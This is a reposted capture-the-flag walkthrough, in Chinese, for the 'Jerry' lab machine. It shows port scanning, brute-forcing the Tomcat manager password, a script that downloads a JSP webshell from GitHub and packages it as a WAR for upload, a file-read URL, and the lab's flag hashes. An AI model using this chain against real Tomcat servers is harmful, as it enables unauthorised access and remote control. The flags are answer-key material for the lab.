欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 时评 > [Meachines] [Easy] jerry Tomcat用户暴力破解+war包webshell上传

[Meachines] [Easy] jerry Tomcat用户暴力破解+war包webshell上传

2025/9/19 6:03:00 来源:https://blog.csdn.net/qq_51886509/article/details/141471129  浏览:    关键词:[Meachines] [Easy] jerry Tomcat用户暴力破解+war包webshell上传

信息收集

IP AddressOpening Ports
10.10.10.95TCP:8080

$ sudo masscan -p1-65535 10.10.10.95 --rate=1000 -e tun0 > /tmp/ports

$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

$ nmap -p$ports 10.10.10.95 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds

Tomcat

https://github.com/bl4de/security-tools/blob/master/apache-tomcat-login-bruteforce.py

爆破tomcat密码

$ python3 apache-tomcat-login-bruteforce.py -H 10.10.10.95

image.png

s3cret

image-2.png

创建 WAR 包

# gen_war.sh
#!/bin/sh 
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp 
rm -rf wshell 
rm -f wshell.war 
mkdir wshell 
cp index.jsp wshell/ 
cd wshell 
jar -cvf ../wshell.war * 

$ chmod +x gen_war.sh

$ ./gen_war.sh

image-5.png

image-4.png

image-6.png

可以直接通过这个目录找到两个Flag

http://10.10.10.95:8080/wshell/?sort=1&file=C%3A%5CUsers%5CAdministrator%5CDesktop%5Cflags%5C2+for+the+price+of+1.txt

image-7.png

User.txt

7004dbcef0f854e0fb401875f26ebd00

Root.txt

04a8b36e1545a455393d067e772fe90e

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词